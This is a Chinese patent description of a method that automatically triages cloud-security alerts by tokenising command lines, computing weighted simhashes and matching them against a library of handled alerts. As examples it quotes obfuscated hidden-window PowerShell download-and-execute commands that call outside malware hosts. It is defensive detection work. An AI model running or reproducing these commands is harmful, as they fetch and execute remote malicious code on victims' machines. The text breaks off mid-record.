信息的处理方法、装置及电子设备与流程

1.本发明涉及计算机领域，具体而言，涉及一种信息的处理方法、装置及电子设备。


背景技术：

2.在产品开发过程中常常会出现报错的情况，开发人员需要对报错的信息进行处理。报错信息一般以告警、提示或者推送的方式发送至开发人员所使用的终端，以提示开发人员根据报错信息对错误进行修复。例如，在日常云上安全运营中，告警信息的表现形式一般是命令行。在常规的运营中开发人员需要对于每一条告警命令行中的内容进行分析，并对该告警进行处理。例如确定告警是否正确、告警具体危害的内容(远控木马，挖矿，勒索等)、提取威胁指标信息(indicators of compromise，简称ioc)、补充解决方案等。
3.目前处理报错信息的方式通常是由开发人员进行常规筛选汇总后，由开发人员逐条进行处理。开发人员每天需处理的任务仍然高达数千条，浪费人力，且处理效率低。
4.针对相关技术中，人工处理信息效率低的问题，目前尚未存在有效的解决方案。


技术实现要素：

5.本发明实施例提供了一种信息的处理方法、装置及电子设备，以至少解决人工处理信息效率低的技术问题。
6.根据本发明实施例的一个方面，提供了一种信息的处理方法，包括：对待处理信息进行字符串转换处理，得到待处理字符串，其中，上述待处理信息用于提示出现待处理的错误信息；获取对上述待处理字符串进行划分后得到的分词集合，其中，上述分词集合中包括至少两个分词，上述至少两个分词中的每个分词包括至少两个字符；根据上述分词集合和与上述分词集合对应的一组权重值，确定上述待处理信息的第一哈希值；通过上述第一哈希值，在历史信息库中识别与上述待处理信息匹配的已处理信息；对上述待处理信息执行目标处理操作，其中，上述目标处理操作为对上述已处理信息执行的处理操作。
7.可选地，上述根据上述分词集合和与上述分词集合对应的一组权重值，确定上述待处理信息的第一哈希值，包括：获取上述分词集合中每个分词的哈希值，共得到一组哈希值；对上述一组哈希值和上述一组权重值进行加权求和，得到上述第一哈希值，其中，上述一组权重值与上述分词集合中的分词的类型对应。
8.可选地，上述方法包括：确定上述分词集合中的每个分词的类型，其中，上述每个分词的类型与上述每个分词在同一类型的待处理信息中出现的次数或频率匹配；根据上述每个分词的类型，确定上述每个分词对应的权重值，共得到上述一组权重值。
9.可选地，上述确定上述分词集合中的每个分词的类型，包括：在第一分词在第一类型的待处理信息中出现的次数大于第一阈值或者出现的频率大于第二阈值时，将上述第一分词的类型确定为预设的第一类型，其中，上述分词集合包括上述第一分词，上述第一类型对应的上述第一分词的权重值为第一权重值；在第二分词在上述第一类型的待处理信息中出现的次数小于上述第一阈值或者出现的频率小于上述第二阈值时，将上述第二分词的类
型确定为预设的第二类型，其中，上述分词集合包括上述第二分词，上述第二类型对应的上述第二分词的权重值为第二权重值，上述第一权重值大于上述第二权重值。
10.可选地，上述通过上述第一哈希值，在历史信息库中识别与上述待处理信息匹配的已处理信息，包括：获取上述第一哈希值与第二哈希值之间的相似度，其中，上述第二哈希值为上述已处理信息的哈希值，上述历史信息库中包括上述已处理信息以及上述第二哈希值；在上述相似度大于或等于预设阈值时，将上述已处理信息确定为与上述待处理信息匹配。
11.可选地，上述获取上述第一哈希值与第二哈希值之间的相似度，包括：获取上述第一哈希值与上述第二哈希值之间的距离，其中，上述相似度包括上述距离。
12.可选地，上述通过上述第一哈希值，在历史信息库中识别与上述待处理信息匹配的已处理信息，包括：获取上述第一哈希值与第二哈希值之间的相似度，其中，上述第二哈希值为上述已处理信息的哈希值，上述历史信息库中包括上述已处理信息以及上述第二哈希值；在上述相似度大于或等于预设阈值、且上述待处理信息中包括的第一威胁指标信息与上述已处理信息中包括的第二威胁指标信息相同时，将上述已处理信息确定为与上述待处理信息匹配。
13.可选地，在历史信息库中识别与上述待处理信息匹配的已处理信息之后，上述方法还包括：将上述待处理信息和上述已处理信息确定为同一类型的信息；或者将上述待处理信息和上述已处理信息确定为同一类型的信息，并将上述待处理信息以及上述待处理信息的信息类型记录在上述历史信息库中。
14.可选地，上述方法还包括：在上述历史信息库中识别不到与上述待处理信息匹配的已处理信息时，确定对上述待处理信息的第一处理操作；对上述待处理信息执行上述第一处理操作；将具有对应关系的上述待处理信息和上述第一处理操作记录在上述历史信息库中。
15.可选地，上述对待处理信息进行字符串转换处理，得到待处理字符串，包括：在上述待处理信息中包括加密字符串时，将上述加密字符串解密成解密字符串；将上述解密字符串与上述待处理信息中除上述加密字符串之外的其他字符串，组成上述待处理字符串。
16.可选地，上述对上述待处理信息执行目标处理操作，包括：在上述待处理信息中包括预设的威胁指标信息时，对上述待处理信息执行拦截操作，其中，上述目标处理操作包括上述拦截操作。
17.可选地，上述对上述待处理信息执行目标处理操作，包括：在上述已处理信息包括多个信息时，对上述待处理信息执行第一处理操作，其中，上述目标处理操作包括上述第一处理操作，上述第一处理操作为对上述多个信息中的一个信息执行的处理操作。
18.可选地，上述对上述待处理信息执行第一处理操作，包括：在多个处理操作中确定执行次数最多的一个处理操作，其中，上述多个处理操作是对上述多个信息执行的处理操作，上述多个信息的类型不同；对上述待处理信息执行上述第一处理操作。
19.根据本发明实施例的另一方面，还提供了一种信息的处理装置，包括：处理模块，用于对待处理信息进行字符串转换处理，得到待处理字符串，其中，上述待处理信息用于提示出现待处理的错误信息；获取模块，用于获取对上述待处理字符串进行划分后得到的分词集合，其中，上述分词集合中包括至少两个分词，上述至少两个分词中的每个分词包括至
少两个字符；确定模块，用于根据上述分词集合和与上述分词集合对应的一组权重值，确定上述待处理信息的第一哈希值；识别模块，用于通过上述第一哈希值，在历史信息库中识别与上述待处理信息匹配的已处理信息；执行模块，对上述待处理信息执行目标处理操作，其中，上述目标处理操作为对上述已处理信息执行的处理操作。
20.根据本发明实施例的又一方面，还提供了一种计算机可读的存储介质，该计算机可读的存储介质中存储有计算机程序，其中，该计算机程序被设置为运行时执行上述方法。
21.根据本发明实施例的又一方面，还提供了一种电子设备，包括存储器和处理器，上述存储器中存储有计算机程序，上述处理器被设置为通过上述计算机程序执行上述方法。
22.在本发明实施例中，在历史信息库中查找与待处理信息相似的已处理信息，使用已处理信息的处理方式对待处理的待处理信息进行处理。直接复用已有的已处理信息的处理方法对待处理信息进行处理，自动对待处理信息进行处理，达到了使用已处理信息的处理方式自动对待处理信息进行处理的目的，从而实现了提高待处理信息的处理效率的技术效果，进而解决了人工处理信息效率低的技术问题。
附图说明
23.此处所说明的附图用来提供对本发明的进一步理解，构成本技术的一部分，本发明的示意性实施例及其说明用于解释本发明，并不构成对本发明的不当限定。在附图中：
24.图1是根据本发明实施例的一种可选的信息的处理方法的应用环境的示意图；
25.图2是根据本发明实施例的信息的处理方法流程示意图；
26.图3是根据本发明可选实施例的信息预处理流程示意图；
27.图4是根据本发明可选实施例的历史信息库示意图；
28.图5是根据本发明可选实施例的查询检索流程示意图；
29.图6是根据本发明可选实施例的信息自动化分析系统流程示意图；
30.图7是根据本发明可选实施例的信息的处理装置系统框图；
31.图8是根据本发明实施例的一种可选的电子设备的结构示意图。
具体实施方式
32.为了使本技术领域的人员更好地理解本发明方案，下面将结合本发明实施例中的附图，对本发明实施例中的技术方案进行清楚、完整地描述，显然，所描述的实施例仅仅是本发明一部分的实施例，而不是全部的实施例。基于本发明中的实施例，本领域普通技术人员在没有做出创造性劳动前提下所获得的所有其他实施例，都应当属于本发明保护的范围。
33.需要说明的是，本发明的说明书和权利要求书及上述附图中的术语“第一”、“第二”等是用于区别类似的对象，而不必用于描述特定的顺序或先后次序。应该理解这样使用的数据在适当情况下可以互换，以便这里描述的本发明的实施例能够以除了在这里图示或描述的那些以外的顺序实施。此外，术语“包括”和“具有”以及他们的任何变形，意图在于覆盖不排他的包含，例如，包含了一系列步骤或单元的过程、方法、系统、产品或设备不必限于清楚地列出的那些步骤或单元，而是可包括没有清楚地列出的或对于这些过程、方法、产品或设备固有的其它步骤或单元。
34.云安全(cloud security)是指基于云计算商业模式应用的安全软件、硬件、用户、机构、安全云平台的总称。云安全融合了并行处理、网格计算、未知病毒行为判断等新兴技术和概念，通过网状的大量客户端对网络中软件行为的异常监测，获取互联网中木马、恶意程序的最新信息，并发送到服务端进行自动分析和处理，再把病毒和木马的解决方案分发到每一个客户端。
35.云安全主要研究方向包括：1.云计算安全，主要研究如何保障云自身及云上各种应用的安全，包括云计算机系统安全、用户数据的安全存储与隔离、用户接入认证、信息传输安全、网络攻击防护、合规审计等；2.安全基础设施的云化，主要研究如何采用云计算新建与整合安全基础设施资源，优化安全防护机制，包括通过云计算技术构建超大规模安全事件、信息采集与处理平台，实现对海量信息的采集与关联分析，提升全网安全事件把控能力及风险控制能力；3.云安全服务，主要研究各种基于云计算平台为用户提供的安全服务，如防病毒服务等。
36.根据本发明实施例的一个方面，提供了一种信息的处理方法，可选地，作为一种可选的实施方式，上述信息的处理方法可以但不限于应用于如图1所示的由服务器102和终端设备104所构成的硬件环境中。如图1所示，服务器102通过网络与终端设备104进行连接，上述网络可以包括但不限于：有线网络，无线网络，其中，该有线网络包括：局域网、城域网和广域网，该无线网络包括：蓝牙、wifi及其他实现无线通信的网络。上述终端设备可以包括但不限于以下至少之一：手机(如android手机、ios手机等)、笔记本电脑、平板电脑、掌上电脑、mid(mobile internet devices，移动互联网设备)、pad、台式电脑、智能电视等。上述服务器可以是单一服务器，也可以是由多个服务器组成的服务器集群，或者是云服务器。上述仅是一种示例，本实施例中对此不作任何限定。
37.可选地，作为一种可选的实施方式，如图2所示，上述信息的处理方法包括：
38.步骤s202，对待处理信息进行字符串转换处理，得到待处理字符串，其中，上述待处理信息用于提示出现待处理的错误信息；
39.其中，上述待处理信息可以是告警信息、提示信息或推送信息等。待处理信息用于提示开发人员存在待处理的错误信息，该错误信息可以是软件或硬件出现错误，例如开发软件过程中出现的任务报错，或者硬件设备出现故障的报错信息。不同类型的错误信息的格式可能不同，包含的内容存在差异。例如有些信息中包含“
”“‑”
等符号。为了防止“
”“‑”
等符号对个信息识别准确度的影响，需要对待处理信息进行字符串转换处理，将待处理信息转换为字符串，得到待处理的字符串。
40.步骤s204，获取对上述待处理字符串进行划分后得到的分词集合，其中，上述分词集合中包括至少两个分词，上述至少两个分词中的每个分词包括至少两个字符；
41.其中，由于不同待处理信息中出现的分词的种类和频率不同，有些词语在某种类型的信息中出现的频率较高，该词语可以明显的标识该类信息，因此，可以基于分词区分不同类型的信息。对上述得到的待处理字符串进行分词处理，得到待处理信息对应的分词集合，基于分词集合可以对待处理信息进行识别。
42.步骤s206，根据上述分词集合和与上述分词集合对应的一组权重值，确定上述待处理信息的第一哈希值；
43.其中，在不同类型的待处理信息中，分词权重一般是不同的，权重高的分词是能够
起到标识该类信息的分词。以告警信息为例，在某种类型告警信息中，出现频率较高的分词的权重较高。而标准语句一般会出现在不同种类的告警信息中，对于此种分词的权重值较小。根据分词和对应的权重值可以得到待处理信息的哈希值，通过哈希值可以在历史信息库中查找到与待处理信息相似的已处理信息，使用已处理信息的处理方式对待处理信息进行处理，可以提高待处理信息的处理效率。
44.步骤s208，通过上述第一哈希值，在历史信息库中识别与上述待处理信息匹配的已处理信息；
45.其中，历史信息库中存储了已处理信息，以及对已处理信息的处理方法。通过待处理信息的哈希值在历史信息库中查找与待处理信息相似的已处理信息，通过已处理信息的处理方式对待处理信息进行处理，可以提高待处理信息的处理效率。
46.步骤s210，对上述待处理信息执行目标处理操作，其中，上述目标处理操作为对上述已处理信息执行的处理操作。
47.其中，目标处理操作是对历史信息库中已处理信息的处理方式，历史信息库中可以关联存储已处理信息以及对应的目标处理操作。由于待处理信息与已处理信息相似，可以直接采用已处理信息的处理方式对待处理信息进行处理，可以达到自动对待处理信息进行处理的目的，提高待处理信息的处理效率。
48.通过上述步骤，在历史信息库中查找与待处理信息相似的已处理信息，使用已处理信息的处理方式对待处理信息进行处理。直接复用已有的已处理信息的处理方法对待处理信息进行处理，自动对待处理信息进行处理，达到了使用已处理信息的处理方式自动对待处理信息进行处理的目的，从而实现了提高待处理信息的处理效率的技术效果，进而解决了人工处理信息效率低的技术问题。
49.作为一个可选的实施方式，上述待处理信息可以是待处理的告警信息、推送信息或提示信息等。以待处理信息是告警信息为例，告警信息可以以告警指令的方式呈现，以下述告警为例：
50.powershell
‑
w hidden ie`x(ne`w
‑
obj`ectnet.webc`lient).downloadstring(h**p://i.ha" "qo.net/7p.php？0.9*ipc*system*sc004*" [environment]::osversion.version.major)；bpu("h**p://i.ha" "qo.net/ipc.jsp？0.9")
[0051]
由于不同种类的信息格式不同，包含的内容存在差异，例如有些信息中会出现一些符号，如“
”“‑”“
*”等符号，而这些符号对于信息类型识别贡献较小，还会影响到信息识别的准确性。因此，需要对待处理信息进行预处理，如图3所示是根据本发明可选实施例的信息预处理流程示意图，其中，对待处理信息进行预处理可以包括如下步骤：
[0052]
步骤s31，对待处理信息进行字符串转换，可以将“字符” “串”这类命令转换为“字符串”。以待处理信息为上述告警信息为例，可以将上述告警信息中加号“ ”前后均为字符串，需要进行字符串转换处理，去除加号“ ”得到字符串。对于系统命令于[environment]前的 可以不用处理。可以将上述告警信息进行字符串转换后得到如下字符串：
[0053]
powershell
‑
w hidden ie`x(ne`w
‑
obj`ectnet.webc`lient).downloadstring("h**p://i.haqo.net/10p.php？0.9*ipc*system*tqhn*" [environment]::osversion.version.major)；bpu("h**p:///i.haqo.net/ipc.jsp？0.8")
[0054]
步骤s32，判断待处理信息中是否存在加密字符串，若存在加密字符串，则对加密
字符串进行解码得到解密字符串，将解密字符串与待处理信息中的其他字符串组成待处理的字符串。若待处理信息中不存在加密字符串，则执行步骤s33。例如，以上述待处理信息为告警信息为例，判断告警信息中是否存在base64解码代码。若告警中存在base64解码代码，则将base64加密后的内容解码。若告警中不存在base64解码代码则执行步骤s33。
[0055]
步骤s33，对待处理字符串进行分词处理。由于不同待处理信息中出现的分词的种类和频率不同，有些词语在某种类型的待处理信息中出现的频率较高，该词语可以明显的标识该类信息，因此，可以基于分词区分不同类型的待处理信息。以上述待处理信息为待处理的告警信息为例，对于上述告警信息对应的待处理字符串进行分词后，可以得到如下分词结果：
[0056]
['powershell','
‑
w','hidden','ie`x','ne`w
‑
obj`ect','net.webc`lient','downloadstring','h**p://i.haqo.net/10.php？0.9*ipc*system*tqhn*','[environment]::osversion.version.major','bpu','h**p://i.haqo.net/ipc.jsp？0.9']
[0057]
在本实施例中，通过上述步骤完成对待处理信息的预处理，通过预处理的结果可以计算该待处理信息的哈希值，通过哈希值可以在已处理的历史信息库中查找与待处理信息相匹配的已处理信息，采用已处理信息的处理方式对待处理信息进行处理，可实现待处理信息的自动处理，避免了人工处理信息需要消耗大量的人力资源，且效率低的问题，且有效的提高了信息处理的效率。
[0058]
可选地，所述根据所述分词集合和与所述分词集合对应的一组权重值，确定所述待处理信息的第一哈希值，包括：获取所述分词集合中每个分词的哈希值，共得到一组哈希值；对所述一组哈希值和所述一组权重值进行加权求和，得到所述第一哈希值，其中，所述一组权重值与所述分词集合中的分词的类型对应。
[0059]
作为一个可选的实施方式，以上述待处理信息为告警信息为例，由于不同种类的告警信息中包括的分词不同，有些分词在某种告警中出现的频率较高，该分词可以明显的标识这种类型的告警，该分词具有明显的辨识度。而标准语句或系统命令的分词通常会出现在各种不同类型的告警中，例如上述告警中[environment]为系统命令，不同类型的告警中均可出现[environment]分词，又例如，上述告警中'downloadstring'为标准语句，不同类型的告警中也均可出现'downloadstring'分词，因此，这种分词对于告警类型的辨识度较低。在本实施例中，可以对不同的分词赋予不同的权重值。计算待处理告警中每个分词的哈希值后加权求和，可以得到待处理告警的哈希值。哈希值的求取方式可以采用局部敏感哈希算法，例如，simhash其主要思想是降维，将高维的特征向量映射成低维的特征向量。在本实施例中，通过为不同分词赋予不同的权重可以得到不同类型待处理信息的哈希值，根据哈希值可确定与待处理信息类型相似的已处理信息，进而通过已处理信息的处理方式对待处理信息进行处理，可以达到提高信息处理效率的技术效果。
[0060]
可选地，上述方法包括：确定上述分词集合中的每个分词的类型，其中，上述每个分词的类型与上述每个分词在同一类型的待处理信息中出现的次数或频率匹配；根据上述每个分词的类型，确定上述每个分词对应的权重值，共得到上述一组权重值。
[0061]
作为一个可选的实施方式，可以根据分词在同一类型信息中的出现的次数或者频率为分词赋予不同的权重值。以上述待处理信息为告警信息为例，对于同一类型中出现次
数或频率较高的分词，其具有一定的代表性，对于该类型的告警具有较高的标识性和分辨度。对于出现次数或频率较高的分词可以赋予较高的权重。又例如，对于标准语句或系统命令在不同类型的告警中均可以出现，无法对一类告警进行标识，其标识性较差，分辨度较低，系统命令和标准语句的权重赋予较小的值。在本实施例中，通过根据分词在每种类型信息中出现的次数或频率为该分词赋予较高的权重，可以提高不同类型告警的辨识度，提高告警处理的准确性。
[0062]
可选地，上述确定上述分词集合中的每个分词的类型，包括：在第一分词在第一类型的待处理信息中出现的次数大于第一阈值或者出现的频率大于第二阈值时，将上述第一分词的类型确定为预设的第一类型，其中，上述分词集合包括上述第一分词，上述第一类型对应的上述第一分词的权重值为第一权重值；在第二分词在上述第一类型的待处理信息中出现的次数小于上述第一阈值或者出现的频率小于上述第二阈值时，将上述第二分词的类型确定为预设的第二类型，其中，上述分词集合包括上述第二分词，上述第二类型对应的上述第二分词的权重值为第二权重值，上述第一权重值大于上述第二权重值。
[0063]
作为一个可选的实施方式，上述第一分词可以是具有代表性分词，可以是同一类型信息中出现次数或频率较高的分词。在本实施例中，以上述待处理信息为告警信息为例，具有代表性的分词可以是网址类分词，例如，'h**p://i.haqo.net/ipc.jsp？0.9'属于网址类分词。由于不同类型的告警中出现的网址一般不同，相同的网址通常不会出现在不同的告警中，因此，网址分词对该类型的告警具有一定的代表性，可以用于标识该类型的告警。在本实施例中，网址分词仅为了说明本实施例，具有代表性的第一分词还可以是在同一类型告警中出现频率或次数较高的其他分词。具体地，可以对同一类型的告警中每个分词出现的频率进行统计，确定出现次数大于第一阈值，或者出现频率大于第二阈值的分词作为此种类型告警中的第一分词。第一阈值和第二阈值可以根据实际情况而定，例如，第一阈值可以是30、50、100等，第二阈值可以是60％、70％等。在本实施例中，通过分词在同一类型告警中出现的次数或频率，确定该类型告警中具有代表性的第一分词，为具有代表性的第一分词赋予较高的第一权重值，第一权重值大小可以根据实际情况而定，例如可以是0.5、0.6、0.7等，在此不作限定。通过权重值可以明显的区分出不同类型的告警信息，提高不同类型告警信息的区分度和辨识性。可以提高告警信息的识别准确度。
[0064]
作为一个可选的实施方式，对于在同一类型信息中出现频率较低的分词，其难以代表该类型的信息，代表性和标识度较低，对于该种分词可以赋予较低的区。以告警信息为例，标准语句和系统指令可以出现在不同类型的告警中，第二分词可以是downloadstring、[environment]等标准语句或系统指令，对于该种分词在不同类型的告警中均可以出现，但是在同一类型的告警中出现频率较低。具体地，可以统计每种类型的告警中分词出现的次数或频率，对于出现次数小于第一阈值，或出现频率大于第二阈值的分词为不具备代表性的第二分词。第一阈值和第二阈值可以根据实际情况而定，例如第一阈值可以是50、100等，第二阈值可以是0.5、0.6等。对于标准语句和系统指令分词可以赋予较小的第二权重值，第二权重值的大小可以根据实际情况而定，例如可以是0.1、0.2等。在本实施例中，通过为同种类型中出现次数或出现频率较低的分词赋予较小的权重值，可以减少不具有同类型告警信息中不具有代表性的分词对告警识别的影响，增大不同类型告警信息的区分度和辨识性，可以提高告警信息的识别准确度。
[0065]
可选地，上述通过上述第一哈希值，在历史信息库中识别与上述待处理信息匹配的已处理信息，包括：获取上述第一哈希值与第二哈希值之间的相似度，其中，上述第二哈希值为上述已处理告警信息的哈希值，上述历史信息库中包括上述已处理信息以及上述第二哈希值；在上述相似度大于或等于预设阈值时，将上述已处理信息确定为与上述待处理信息匹配。
[0066]
作为一个可选的实施方式，历史信息库中存储了已处理的信息，以及已处理信息的哈希值，已处理信息和相应的哈希值可以关联存储在历史信息库中。可以通过待处理信息的第一哈希值与历史信息库中的存储的第二哈希值进行相似度比较，确定相似度大于预设阈值的哈希值所对应的已处理信息，为与待处理的待处理信息相匹配的已处理信息。在本实施例中，通过相似度比较可以在历史信息库中匹配出与待处理信息相似的已处理信息，采用与已处理信息相同的处理方式对待处理信息进行处理，可以达到自动处理信息的目的，提高信息处理效率。以上述待处理信息为待处理的告警信息为例，可以根据待处理告警信息的哈希值与历史信息库中存储的已处理告警信息进行相似度比较，确定相似度大于预设阈值的哈希值对应的已处理告警信息为与待处理告警信息相匹配的告警信息，采用已处理告警信息的处理方式对待处理告警信息进行处理，提高了待处理告警信息的处理效率。
[0067]
可选地，上述获取上述第一哈希值与第二哈希值之间的相似度，包括：获取上述第一哈希值与上述第二哈希值之间的距离，其中，上述相似度包括上述距离。
[0068]
作为一个可选的实施方式，可以采用汉明距离计算待处理信息的第一哈希值与已处理信息的第二哈希值之间的相似度。两个等长字符串之间的汉明距离(hamming distance)是两个字符串对应位置的不同字符的个数。换句话说，它就是将一个字符串变换成另外一个字符串所需要替换的字符个数。利用汉明距离判断待处理的告警和已处理的告警的相似度。若新增的待处理信息和已处理信息相似度达到阈值，则可以认为该待处理信息和已处信息一致。故可以直接复用已处理信息的处理方法，自动处理该条待处理信息。利用该方法可以将实现每日新增待处理信息自动处理，提高信息处理效率。
[0069]
可选地，所述通过所述第一哈希值，在历史信息库中识别与所述待处理信息匹配的已处理信息，包括：获取所述第一哈希值与第二哈希值之间的相似度，其中，所述第二哈希值为所述已处理信息的哈希值，所述历史信息库中包括所述已处理信息以及所述第二哈希值；在所述相似度大于或等于预设阈值、且所述待处理信息中包括的第一威胁指标信息与所述已处理信息中包括的第二威胁指标信息相同时，将所述已处理信息确定为与所述待处理信息匹配。
[0070]
作为一个可选的实施方式，可以使用威胁指标信息(indicators of compromise，简称ioc)对待处理信息识别进行辅助认证。通过待处理信息的哈希值与历史信息库中已处理信息的哈希值之间的距离，可以确定出与待处理信息相似的已处理信息。在确定出相似的已处理信息后，可以通过威胁指标信息进行辅助验证。对于相同类型的信息，其威胁指标信息一般是相同的。下面以上述待处理信息为告警信息为例，假设在历史信息库中识别出已处理告警1、已处理告警2和已处理告警3是与待处理告警相似的告警。可以进一步在已处理告警1、已处理告警2和已处理告警3识别出与待处理告警威胁指标信息相同的已处理告警。在本实施例中，通过威胁指标信息辅助验证与待处理信息相匹配的已处理信息，可以提
高信息识别的准确度，提高自动处理信息的准确性。
[0071]
可选地，在历史信息库中识别与上述待处理信息匹配的已处理信息之后，上述方法还包括：将上述待处理信息和上述已处理信息确定为同一类型的信息；或者将上述待处理信息和上述已处理信息确定为同一类型的信息，并将上述待处理信息以及上述待处理信息的信息类型记录在上述历史信息库中。
[0072]
作为一个可选的实施方式，在历史信息库中识别出与待处理信息相匹配的已处理信息后，确定该已处理信息与待处理信息是同种类型的信息，可以采用已处理信息的处理方式对待处理信息进行处理，以达到自动处理信息的目的。采用已处理信息的处理方式对待处理信息进行处理后，可以将待处理信息以及待处理信息的类型存储在历史信息库中，以便后续对其他待处理信息进行处理。下面以待处理信息为告警信息为例，在历史信息库中识别出与待处理告警信息相匹配的已处理告警信息后，确定该已处理告警信息与待处理告警信息是同种类型的告警，可以采用已处理告警信息的处理方式对待处理告警信息进行处理，以达到自动处理告警信息的目的。
[0073]
可选地，上述方法还包括：在上述历史信息库中识别不到与上述待处理信息匹配的已处理信息时，确定对上述待处理信息的第一处理操作；对所述待处理信息执行所述第一处理操作；将具有对应关系的所述待处理信息和所述第一处理操作记录在所述历史信息库中。
[0074]
作为一个可选的实施方式，若历史信息库中不存在与待处理信息相匹配的已处理信息，确定待处理信息的处理方式，对待处理信息进行处理后，将待处理信息和相应的处理方式关联存储在历史信息库中，以对历史信息库进行更新，丰富历史信息库中已处理信息的种类和处理方式，提高信息处理的准确率。
[0075]
可选地，上述对待处理的待处理信息进行字符串转换处理，得到待处理字符串，包括：在上述待处理信息中包括加密字符串时，将上述加密字符串解密成解密字符串；将上述解密字符串与上述待处理信息中除上述加密字符串之外的其他字符串，组成上述待处理字符串。
[0076]
作为一个可选的方式，若待处理信息中存在加密字符串，可以对该加密字符串进行解密，得到解密字符串。将解密字符串与其他字符串组成待处理的字符串。以上述待处理信息为告警信息为例，若待处理的告警信息中存在base64解码代码，则将base64加密后的内容进行解码，将解码的字符与其他字符组成待处理的字符串。在本实施例中，通过对加密字符串进行解密，可以提高信息的识别率。
[0077]
可选地，上述对上述待处理信息执行目标处理操作，包括：在上述待处理信息中包括预设的威胁指标信息时，对上述待处理信息执行拦截操作，其中，上述目标处理操作包括上述拦截操作。
[0078]
作为一个可选的实施方式，威胁指标信息可以用于指示该类信息的危险程度。对于危险程度较高的信息可以对其进行拦截，以防止该类信息对云安全进行威胁。例如，威胁指标信息可以用于指示告警信息的危险程序，对于危险程度较高的告警信息可以直接进行拦截，，可以达到保证云安全的效果。
[0079]
可选地，上述对上述待处理信息执行目标处理操作，包括：在上述已处理信息包括多个信息时，对上述待处理信息执行第一处理操作，其中，上述目标处理操作包括上述第一
处理操作，上述第一处理操作为对上述多个信息中的一个信息执行的处理操作。
[0080]
作为一个可选的实施方式，若在历史信息库中匹配出多个与待处理信息相似的已处理信息，可以依次采用多个已处理信息的处理方式对待处理信息进行处理，直到完成对待处理信息的处理。也可以随机在多个已处理信息中选择一个已处理信息对待处理信息进行处理。
[0081]
可选地，上述对上述待处理信息执行第一处理操作，包括：在多个处理操作中确定执行次数最多的一个处理操作，其中，上述多个处理操作是对上述多个信息执行的处理操作，上述多个信息的类型不同；对上述待处理信息执行上述第一处理操作。
[0082]
作为一个可选的实施方式，若在历史信息库中匹配出多个与待处理信息相似的已处理信息，可以选择执行次数最多的已处理信息的处理方式对待处理信息进行处理。
[0083]
作为一个可选的实施方式，自动化分析系统的框架示意图，可以包括历史数据处理系统和查询检索系统，历史数据处理系统包括历史信息库，如图4所示是根据本发明可选实施例的历史信息库示意图。其中，历史信息库中存储了不同类型的已处理信息，如图中已处理信息1、已处理信息2和已处理信息n。以上述待处理信息为告警信息为例，历史信息库中可以存储了“家族团伙”“永恒之蓝团伙”“darkcoment”等不同类型的告警信息，不同类型的告警与其对应的哈希值、威胁指标信息关联存储，例如，“家族团伙”对应的哈希值为simhash0，对应的威胁指标信息为ioc0。
[0084]
如图5所示是根据本发明可选实施例的查询检索流程示意图，其中包括如下步骤：
[0085]
步骤s51，获取待处理的待处理信息。其中，当感知系统中出现新增待处理信息时，该待处理信息会被推送到查询检索系统中，查询系统获取新的待处理信息；
[0086]
步骤s52，对待处理信息通过字符串操作函数进行转换，将“字符” “串”这类信息转换为“字符串”；
[0087]
步骤s53，判断字符串中是否存在加密字符串，若存在加密字符串执行步骤s54，若不存在加密字符串执行步骤s55。
[0088]
步骤s54，对加密字符串进行解密，得到解密字符串，并将解密字符串与待处理信息中的其他字符串组成待处理字符串。例如，若待处理信息中存在base64解码代码，则将base64加密后的内容解码。
[0089]
步骤s55，对字符串进行分词处理；
[0090]
步骤s56，计算所有分词的权值，并基于分词和权值计算待处理的待处理信息的simhash。假设经过计算得到待处理信息的simhash为0x128002020230，涉及的ioc信息为ioc：i.haqo.net。
[0091]
步骤s57，将待处理信息的simhash和历史信息库中的所有simhash对比计算汉明距离。假设通过计算发现新的待处理信息的simhash0x128002020230和已处理的告警信息的simhash 0x108002020210汉明距离小于预设阈值，预设阈值可以根据实际情况而定，例如可以是3。由此，可以认为待处理信息和已处理信息为同一类告警。故可以认为待处理信息为恶意威胁。利用此种方式，实现了对待处理信息的自动化分析，从而大幅提高信息的分析处理效率。
[0092]
步骤s58，若历史信息库中没有与待处理信息相匹配的已处理信息，可以确定待处理信息处理方式，对该待处理信息进行处理后，将该待处理信息的名称、哈希值、处理方式、
威胁指标信息等关联存储在历史信息库中。
[0093]
作为一个可选的实施方式，历史信息库为整体自动化运营所需的依存库，该知识库数据依赖于历史数据处理系统添加。如图6所示是根据本发明可选实施例的自动化分析系统流程示意图，其中，包括如下步骤：
[0094]
步骤s61，获取历史已处理信息集合；
[0095]
步骤s62，对已处理的信息通过字符串操作函数进行转换，将“字符” “串”这类信息转换为“字符串”；
[0096]
步骤s63，判断字符串中是否存在加密字符串，若存在加密字符串执行步骤s64，若不存在加密字符串执行步骤s65。
[0097]
步骤s64，对加密字符串进行解密，得到解密字符串，并将解密字符串与其他字符串组成新的字符串。例如，若信息中存在base64解码代码，则将base64加密后的内容解码。
[0098]
步骤s65，对字符串进行分词处理；
[0099]
步骤s66，计算所有分词的权值，并基于分词和权值计算已处理信息的simhash。
[0100]
步骤s67，将simhash、已处理信息、处理结果信息按照标准格式化后，存储历史信息库，并将simhash分段建立索引。
[0101]
下面通过一条待处理告警信息详细说明本技术的处理流程，假设在历史信息库中，有一条已处理的告警信息为(后简称为已处理告警信息)，告警内容为：
[0102]
powershell
‑
w hidden ie`x(ne`w
‑
obj`ectnet.webc`lient).downloadstring(h**p://t.amynx.com/7p.php？0.9*ipc*system*tqhn*" [environment]::osversion.version.major)；bpu(h**p://t.amynx.com/ipc.jsp？0.9")
[0103]
经发现该告警定性为恶意行为，所属团伙为永恒之蓝病毒团伙。首先对该已处理告警信息中字符串操作函数进行转换，将“字符” “串”这类命令转换为“字符串”，处理后的字符串内容如下：
[0104]
powershell
‑
w hidden ie`x(ne`w
‑
obj`ectnet.webc`lient).downloadstring("h**p://t.amynx.com/7p.php？0.9*ipc*system*tqhn*" [environment]::osversion.version.major)；bpu("h**p://t.amynx.com/ipc.jsp？0.9")
[0105]
若该已处理告警信息中存在base64解码代码，则将base64加密后的内容解码。处理完成后，对整个字符串行进行分词处理，分词后的结果如下：
[0106]
['powershell','
‑
w','hidden','ie`x','ne`w
‑
obj`ect','net.webc`lient','downloadstring','http://current_host/7p.php？0.9*ipc*system*tqhn*','[environment]::osversion.version.major','bpu','http://current_host/ipc.jsp？0.9']
[0107]
计算上述所有分词的权值，并基于分词和权值计算simhash。经过计算该已处理告警的simhash为0x108002020210。将已处理告警信息、对应的simhash和威胁指标信息格式化后，存储到历史信息库中，并按照simhash建立索引，存储数据格式和内容可以为：
[0108]
[simhash:0x108002020210,
[0109]
ioc:t.amynx.com,
[0110]
威胁定性：恶意威胁
[0111]
